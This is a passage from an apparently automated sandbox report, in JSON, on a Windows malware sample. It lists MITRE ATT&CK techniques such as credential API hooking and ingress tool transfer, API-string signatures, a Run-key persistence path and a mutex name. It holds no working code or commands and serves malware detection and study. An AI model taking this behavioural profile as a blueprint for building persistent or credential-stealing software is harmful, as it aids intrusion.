"https://attack.mitre.org/techniques/T1518/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Credential API Hooking", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "informative_identifiers_count": 4, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Proxy", "attck_id": "T1090", "attck_id_wiki": "https://attack.mitre.org/techniques/T1090", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 2, "informative_identifiers_count": 3}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "string-345", "type": 2, "relevance": 1, "name": "Contains ability to disable/close registry key (API string)", "description": "Found reference to API \"RegCloseKey\" (Indicator: \"RegCloseKey\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"RegCloseKey\" (Indicator: \"RegCloseKey\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API \"RegCloseKey\" (Indicator: \"RegCloseKey\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API \"RegCloseKey\" (Indicator: \"RegCloseKey\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-204", "type": 2, "relevance": 1, "name": "Contains ability to create a new process (API string)", "description": "Found reference to API \"CreateProcessA\" (Indicator: \"CreateProcess\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"CreateProcessA\" (Indicator: \"CreateProcess\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API \"CreateProcessA\" (Indicator: \"CreateProcess\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")\n Found reference to API \"2871032450,5928,3139,,CreateProcessA,kernel32.dll,\"252:02:48.961\",RX=0,PX=0\" (Indicator: \"CreateProcess\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-315", "type": 2, "relevance": 1, "name": "Contains ability to create/open files (API string)", "description": "Found reference to API \"CreateFileA\" (Indicator: \"CreateFile\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"CreateFileMappingW\" (Indicator: \"CreateFile\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"CreateFileW\" (Indicator: \"CreateFile\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"CreateFileW\" (Indicator: \"CreateFile\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API \"CreateFileMappingW\" (Indicator: \"CreateFile\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API \"CreateFileA\" (Indicator: \"CreateFile\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API \"CreateFileA\" (Indicator: \"CreateFile\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-120", "type": 2, "relevance": 1, "name": "Contains registry location strings", "description": "\"Software\\Microsoft\\Windows\\CurrentVersion\\Run\" in Source: 7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\n \"Software\\motherFucker\" in Source: 7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\n \"Software\\Microsoft\\Active Setup\\Installed Components\\{89820200-ECBD-11CF-8B85-00AA005B4383}\" in Source: 00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\n \"Software\\Policies\\Microsoft\\Internet Explorer\\Main\" in Source: 00000000-00001432.00000001.77907.00160000.00000004.mdmp\n \"REGISTRY\\USER\\S-1-5-21-2092356043-4041700817-663127204-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\" in Source: 00000000-00005932.00000000.66521.00270000.00000004.mdmp\n \"Software\\Microsoft\\Windows\\CurrentVersion\\Run\" in Source: 00000000-00005932.00000000.66521.00270000.00000004.mdmp\n \"Software\\motherFucker\" in Source: 00000000-00005932.00000000.66521.00270000.00000004.mdmp\n \"Software\\Policies\\Microsoft\\Internet Explorer\\Main\" in Source: 00000000-00005968.00000001.68534.002B0000.00000004.mdmp\n 00000000-00005968.00000002.70456.002B0000.00000004.mdmp\n 00000000-00005968.00000003.75889.002B0000.00000004.mdmp", "origin": "File/Memory", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-240", "type": 2, "relevance": 1, "name": "Contains ability to execute an application (API string)", "description": "Found reference to API \"ShellExecuteExA\" (Indicator: \"ShellExecute\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"ShellExecuteExA\" (Indicator: \"ShellExecute\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-225", "type": 2, "relevance": 1, "name": "Contains ability to impersonate another user on the local machine (API string)", "description": "Found reference to API \"LogonUser API\" (Indicator: \"LogonUser\"; Source: \"00000000-00001432.00000001.77907.00160000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-307", "type": 2, "relevance": 1, "name": "Contains ability to create/load registry keys (API string)", "description": "Found reference to API \"RegCreateKeyA\" (Indicator: \"RegCreateKey\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"RegCreateKeyA\" (Indicator: \"RegCreateKey\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API \"RegCreateKeyA\" (Indicator: \"RegCreateKey\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\pomdfghrt\"\n \"pomdfghrt\"", "origin": "Created Mutant"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-319", "type": 2, "relevance": 1, "name": "Contains ability to set/get the last-error code for a calling thread (API string)", "description": "Found reference to API \"GetLastError\" (Indicator: \"GetLastError\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"SetLastError\" (Indicator: \"SetLastError\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"GetLastError\" (Indicator: \"GetLastError\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API \"SetLastError\" (Indicator: \"SetLastError\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API \"GetLastError\" (Indicator: \"GetLastError\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API \"GetLastError\" (Indicator: \"GetLastError\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-101", "type": 2, "relevance": 1, "name": "Contains ability to execute Windows APIs", "description": "Found reference to API (Indicator: \"RegOpenKeyA\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"RegCloseKey\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"RegQueryValueExA\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"RegSetValueExA\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"RegOpenKeyExA\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"RegCreateKeyA\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"GetLastError\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"HeapFree\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"GetStdHandle\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"LCMapStringW\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"ReadFile\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"lstrcmpiA\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"WaitForSingleObject\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"GetOEMCP\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"LCMapStringA\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"ExitProcess\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"IsBadWritePtr\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"FlushFileBuffers\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"GetModuleFileNameA\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"RtlUnwind\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"LoadLibraryA\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"HeapAlloc\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"GetCurrentProcess\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"GetWindowsDirectoryA\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"GetFileSize\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"lstrcatA\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"DeleteFileA\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"GetCPInfo\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"MultiByteToWideChar\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"GetProcAddress\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"GetProcessHeap\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"CreateMutexA\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"CreateThread\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"GetStringTypeA\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"FindFirstFileA\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"IsBadCodePtr\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"WriteFile\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"CloseHandle\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"GetACP\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"HeapReAlloc\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"GetStringTypeW\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"TerminateProcess\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"CreateProcessA\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"SetUnhandledExceptionFilter\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"WideCharToMultiByte\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"FindClose\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"Sleep\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"IsBadReadPtr\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"CreateFileA\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"GetTickCount\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"wsprintfA\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"InternetReadFile\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"InternetOpenUrlA\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"InternetCloseHandle\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"InternetOpenA\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"InternetSetOptionExA\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"GetAdaptersInfo\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"GetLastActivePopup\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"GetActiveWindow\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"MessageBoxA\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"ShellExecuteExA\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"VirtualAlloc\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"VirtualFree\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"VirtualProtect\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"GetModuleHandleA\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"SetSecurityDescriptorOwner\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"CopySid\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"GetSecurityDescriptorControl\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"InitializeAcl\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"GetAclInformation\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"RegQueryValueExW\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"SetSecurityDescriptorDacl\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"GetSidSubAuthority\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"GetSecurityDescriptorGroup\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"MakeAbsoluteSD\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"RegOpenKeyExW\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"GetSecurityDescriptorOwner\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"IsValidSid\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"GetSecurityDescriptorDacl\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"GetSecurityDescriptorSacl\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"GetLengthSid\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"InitializeSid\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"AddAce\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"GetSidLengthRequired\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"InitializeSecurityDescriptor\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"SetSecurityDescriptorGroup\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"IsValidSecurityDescriptor\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"GetUserDefaultUILanguage\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"EnterCriticalSection\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"OutputDebugStringW\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"GetModuleFileNameW\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"SetEvent\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"GetVersionExW\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"FreeLibrary\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"QueryPerformanceCounter\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"HeapDestroy\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"OutputDebugStringA\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"GetVersionExA\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"GetFileAttributesW\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"lstrlenW\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"DeleteCriticalSection\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"GetCurrentProcessId\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"WaitForMultipleObjects\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"GetCommandLineW\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"UnhandledExceptionFilter\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"LoadLibraryExW\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"SearchPathW\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"HeapSize\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"MapViewOfFile\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"InterlockedCompareExchange\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"GetLocaleInfoW\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"CreateFileMappingW\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"RaiseException\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"GetSystemDirectoryW\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"GetSystemDefaultUILanguage\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"UnmapViewOfFile\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"LeaveCriticalSection\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"InterlockedExchange\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"FindResourceExW\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"GetStartupInfoA\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"GetSystemTimeAsFileTime\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"GetModuleHandleW\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"LocalFree\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"FormatMessageW\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"LoadLibraryW\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"CreateEventW\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"GetModuleHandleExW\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"InitializeCriticalSection\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"LoadResource\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"OpenEventW\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"CreateFileW\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"SetThreadUILanguage\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"InterlockedDecrement\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"GetFullPathNameW\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API 